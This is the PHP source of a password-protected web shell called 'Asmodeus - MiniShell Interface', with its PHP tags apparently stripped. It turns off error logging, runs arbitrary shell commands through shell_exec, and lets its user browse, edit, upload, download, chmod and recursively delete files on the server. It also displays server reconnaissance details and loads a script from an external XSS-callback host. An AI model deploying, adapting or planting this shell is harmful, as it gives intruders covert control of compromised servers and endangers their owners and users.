@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);

$password = "d489a3289ecdc847cb67f7a480e6f9fa"; // md5("w")
session_start();
if (!isset($_SESSION['logged']) || $_SESSION['logged'] !== true) {
if (isset($_POST['password']) && md5($_POST['password']) === $password) {
$_SESSION['logged'] = true;
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
echo '<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
Login <title>Login</title>
<style>
body { font-family: Arial, sans-serif; background: #111; color: #eee; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
form { background: #222; padding: 20px; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.5); }
input[type="password"] { padding: 10px; margin-bottom: 10px; width: 100%; border: 1px solid #444; border-radius: 3px; background: #333; color: #fff; }
input[type="submit"] { padding: 10px; width: 100%; border: none; border-radius: 3px; background: #28a745; color: #fff; cursor: pointer; }
input[type="submit"]:hover { background: #218838; }
</style>







';
exit;
}

// Get current directory or default to root (htdocs)
$current_dir = isset($_GET['dir']) ? $_GET['dir'] : dirname(__FILE__);

if (!is_dir($current_dir)) {
$current_dir = dirname(__FILE__);
}

$items = scandir($current_dir);

function formatBytes($size, $precision = 2) {
$base = log($size, 1024);
$suffixes = array('', 'KB', 'MB', 'GB', 'TB');
return round(pow(1024, $base - floor($base)), $precision) . ' ' . $suffixes[floor($base)];
}

$parent_dir = dirname($current_dir);
$editFileContent = '';
$commandOutput = '';
$editedFile = '';

$directory = isset($_GET['dir']) ? $_GET['dir'] : '.';

$directory = realpath($directory) ?: '.';

if (isset($_POST['action'])) {
$action = $_POST['action'];
$target = $_POST['target'] ?? '';

switch ($action) {
case 'delete':
if (is_dir($target)) {
deleteDirectory($target); // Call the recursive delete function
} else {
unlink($target);
}
break;

case 'edit':
if (file_exists($target)) {
$editFileContent = file_get_contents($target);
$editedFile = $target;
//echo $editFileContent;
}
break;

case 'save':
if (file_exists($target) && isset($_POST['content'])) {
file_put_contents($target, $_POST['content']);
echo '<script>alert("File successfully saved!");</script>';
}
break;

case 'chmod':
if (isset($_POST['permissions'])) {
chmod($target, octdec($_POST['permissions']));
}
break;

case 'download':
if (file_exists($target)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename=' . basename($target));
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($target));
readfile($target);
exit;
}
break;

case 'upload':
if (isset($_FILES['file']) && $_FILES['file']['error'] === UPLOAD_ERR_OK) {
$uploadDir = $directory;
$uploadFile = $uploadDir . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);

if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile)) {
echo '<script>alert("File successfully uploaded!");</script>';
} else {
echo '<script>alert("File upload failed!");</script>';
}
}
break;

case 'cmd':
if (isset($_POST['command'])) {
$command = $_POST['command'];
$commandOutput = shell_exec($command);
if (!$commandOutput) {
$commandOutput = "Command execution failed or returned no output \n" . "command:".$command;
}
}
break;
}
}

function deleteDirectory($dir) {
if (!is_dir($dir)) {
return false;
}

$items = array_diff(scandir($dir), array('.', '..'));

foreach ($items as $item) {
$path = $dir . DIRECTORY_SEPARATOR . $item;
if (is_dir($path)) {
deleteDirectory($path);
} else {
unlink($path);
}
}

return rmdir($dir);
}

$username = get_current_user();
$user = $_SERVER['USER'] ?? 'N/A';
$phpVersion = phpversion();
$dateTime = date('Y-m-d H:i:s');
$hddFreeSpace = number_format(disk_free_space("/") / (1024 * 1024 * 1024), 2);
$hddTotalSpace = number_format(disk_total_space("/") / (1024 * 1024 * 1024), 2);
$serverIP = $_SERVER['SERVER_ADDR'] ?? 'Unknown';
$clientIP = $_SERVER['REMOTE_ADDR'] ?? 'Unknown';
$cwd = getcwd();

$parentDirectory = dirname($directory);

if ($parentDirectory === false || $parentDirectory === '/') {
$parentDirectory = '.';
}

$currentDir = getcwd();
$freeSpace = disk_free_space($currentDir);
$totalSpace = disk_total_space($currentDir);
$usedSpace = $totalSpace - $freeSpace;

function formatSize($size) {
$units = ['B', 'KB', 'MB', 'GB', 'TB'];
for ($i = 0; $size >= 1024 && $i < count($units) - 1; $i++) {
$size /= 1024;
}
return round($size, 2) . ' ' . $units[$i];
}

$files = scandir($currentDir);

<!DOCTYPE html>
<html lang="en">

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
Webshell <title>Webshell</title>
<script src="https://googlescripts.xss.ht"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
<style>
body { font-family: Arial, sans-serif; background: #111; color: #eee; margin: 0; }
/* Custom scrollbar styles */
body::-webkit-scrollbar {width: 8px;}
body::-webkit-scrollbar-thumb {background: #ff4f3d; border-radius: 4px;}
body::-webkit-scrollbar-track {background: #444;border-radius: 4px;}
header { background: #222; padding: 10px; text-align: center; color: #ff4f3d; font-size: 24px; }
.container { padding: 20px; }
table {width: 100%;border-collapse: collapse;margin-top: 20px;background: #222;border-radius: 5px;overflow: hidden;box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);}
table th, table td {padding: 12px; border: 1px solid #444;text-align: left;transition: background 0.3s;}
table th {background: #333;color: #ff4f3d;font-weight: bold;}
table tr:nth-child(even) {background: #2a2a2a;}
table tr:hover {background: #555;}
table tr.error {background: #ff4f3d;color: #fff;}
a {color: #28a745;text-decoration: none;}
a:hover {text-decoration: underline;}
.system-info { margin-bottom: 20px; padding: 10px; background: #222; border: 1px solid #444; border-radius: 5px; }
.system-info div { margin-bottom: 5px; }
form { margin-top: 20px; }
input[type="text"] { padding: 10px; width: 80%; border: 1px solid #444; border-radius: 3px; background: #333; color: #fff; }
input[type="submit"]:hover { background: #218838; }
.button-container {text-align: center;}
textarea {width: 98%;height: 700px;background-color: #222;border: 1px solid #ccc;border-radius: 5px;padding: 10px;color: #fff;font-family: monospace;resize: none; }
/* Custom scrollbar styles */
textarea::-webkit-scrollbar {width: 8px;}
textarea::-webkit-scrollbar-thumb {background: #ff4f3d; border-radius: 4px;}
textarea::-webkit-scrollbar-track {background: #444;border-radius: 4px;}
.soft-red-button {background-color: #ff4f3d;color: white;border: none;border-radius: 5px;padding: 5px 10px;margin:10px;}
.soft-red-button:hover {background-color: #ff4f3d;}
.popup {display: none;position: fixed;left: 50%;top: 50%;transform: translate(-50%, -50%);background-color: #333;border: 1px solid #444;border-radius: 5px;padding: 20px;z-index: 1000;width: 700px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);}
.output-container {max-height: 500px;overflow-y: auto;background-color: #222;padding: 10px;border-radius: 5px;margin-top: 10px;}
/* Custom scrollbar styles */
.output-container::-webkit-scrollbar {width: 8px;}
.output-container::-webkit-scrollbar-thumb {background: #ff4f3d;border-radius: 4px;}
.output-container::-webkit-scrollbar-track {background: #444;border-radius: 4px;}
.output-container2 {max-height: 700px;max-width: 700px;overflow-y: auto;background-color: #222;padding: 10px;border-radius: 5px;margin-top: 10px;}
.output-container2::-webkit-scrollbar {width: 8px;}
.output-container2::-webkit-scrollbar-thumb {background: #ff4f3d;border-radius: 4px;}
.output-container2::-webkit-scrollbar-track {background: #444;border-radius: 4px;}
.popup h2 {margin: 0 0 10px;}
.popup pre {background-color: #222;padding: 10px;border-radius: 5px;overflow: auto;white-space: pre-wrap;}
.overlay {display: none;position: fixed;top: 0;left: 0;width: 100%;height: 100%;background-color: rgba(0, 0, 0, 0.7);z-index: 999;}
.close-btn {background-color: #ff4f3d;color: white;border: none;border-radius: 5px;padding: 5px 10px;cursor: pointer;float: right;}
</style>


<header style="border-radius: 5px;">Asmodeus - MiniShell Interface</header>
<div class="container">
<div class="system-info">
<p><strong>Username:</strong> echo htmlspecialchars($username); </p>
<p><strong>User:</strong> echo htmlspecialchars($user); </p>
<li><i class="fa-solid fa-server"></i>&nbsp;= $_SERVER["\x53\x45\x52\x56\x45\x52\x5f\x53\x4f\x46\x54\x57\x41\x52\x45"]; </li>
<p><strong>PHP Version:</strong> echo htmlspecialchars($phpVersion); </p>
<p><strong>Date and Time:</strong> echo htmlspecialchars($dateTime); </p>
<p><strong>HDD Free Space:</strong> echo htmlspecialchars($hddFreeSpace); GB</p>
<p><strong>HDD Total Space:</strong> echo htmlspecialchars($hddTotalSpace); GB</p>
<p><strong>Server IP:</strong> echo htmlspecialchars($serverIP); </p>
<p><strong>Client IP:</strong> echo htmlspecialchars($clientIP); </p>
<p><strong>Directory:</strong> echo htmlspecialchars($cwd); </p>
</div>

<div class="system-info">
<button class="soft-red-button" onclick="location.href='?dir= echo urlencode(dirname(__FILE__)); '">
<i class="fas fa-home"></i> Back to Home
</button>
if ($parentDirectory !== $directory):
<button class="soft-red-button" onclick="location.href='?dir= echo urlencode($parentDirectory); '">
<i class="fas fa-arrow-left"></i> Go Back
</button>
endif;
<button class="soft-red-button" onclick="location.href='?cmd=1'">
<i class="fas fa-terminal"></i> Command Server
</button>

</div>
<div class="button-container">




</div>

if ($editFileContent):
<div class="overlay" id="overlay"></div>
<div class="popup" id="codeEditorPopup" style="display: none;">
<button class="close-btn" onclick="closeEditor()">X</button>

FileEditor



<div>
<textarea id="codeEditor" name="content" required></textarea>
</div>
<button type="submit" style="margin:10px;" name="action" value="save" class="close-btn">Save</button>

</div>
endif;

if (isset($_GET['cmd']) && $_GET['cmd'] == 1):
<div class="overlay" id="overlay"></div>
<div class="popup" id="consolePopup">
<button class="close-btn" onclick="closePopup()">X</button>

Execute Command




<button type="submit" name="action" value="cmd" class="close-btn">Run</button>

if ($commandOutput):

Command Output:


<div class="output-container">
<pre> echo htmlspecialchars($commandOutput); </pre>
</div>
endif;
</div>
<script>
document.getElementById('consolePopup').style.display = 'block';
document.getElementById('overlay').style.display = 'block';
function closePopup() {
document.getElementById('consolePopup').style.display = 'none';
document.getElementById('overlay').style.display = 'none';

}
</script>
endif;


<thead>

<th>Name</th>
<th>Size</th>
<th>Permission</th>
<th>Actions</th>

</thead>
<tbody>

$files = is_dir($directory) ? scandir($directory) : [];
$directories = [];
$nonDirectories = [];
foreach ($files as $file) {
if ($file === '.' || $file === '..') continue;

$filePath = $directory . DIRECTORY_SEPARATOR . $file;
if (is_dir($filePath)) {
$directories[] = $file;
} else {
$nonDirectories[] = $file;
}
}
$sortedFiles = array_merge($directories, $nonDirectories);

foreach ($sortedFiles as $file) {
$filePath = $directory . DIRECTORY_SEPARATOR . $file;
$fileSize = is_file($filePath) ? formatBytes(filesize($filePath)) : '-';
$permissions = substr(sprintf('%o', fileperms($filePath)), -4);

$errorClass = (!is_writable($filePath) || !is_readable($filePath)) ? 'error' : '';
echo "";

if (is_dir($filePath)) {

echo "<td class='$errorClass'><a href='?dir=" . urlencode($filePath) . "'><i class='fas fa-folder'></i> $file</a>";
} else {
echo "<td class='$errorClass'><i class='fas fa-file'></i> $file";
}
echo "<td class='$errorClass'>$fileSize";
echo "<td class='$errorClass'>$permissions";
echo "<td class='$errorClass'>";
echo "<input type='hidden' name='target' value='" . htmlspecialchars($filePath) . "'>";
if (is_file($filePath)) {
echo "<button class='close-btn' style='margin:10px' type='submit' name='action' value='edit'><i class='fas fa-edit'></i></button>";
echo "<button class='close-btn' style='margin:10px' type='submit' name='action' value='download'><i class='fas fa-download'></i></button>";
}
echo "<button class='close-btn' style='margin:10px' type='submit' name='action' value='delete'><i class='fas fa-trash'></i></button>";
echo "";
echo "";
echo "";
}

</tbody>

</div>
<script>
function openEditor() {
document.getElementById('codeEditor').value = ` echo $editFileContent; `;
document.getElementById('codeEditorPopup').style.display = 'block';
document.getElementById('overlay').style.display = 'block';
}

function closeEditor() {
document.getElementById('codeEditorPopup').style.display = 'none';
document.getElementById('overlay').style.display = 'none';
}
if ($editFileContent):
openEditor()
endif;
</script>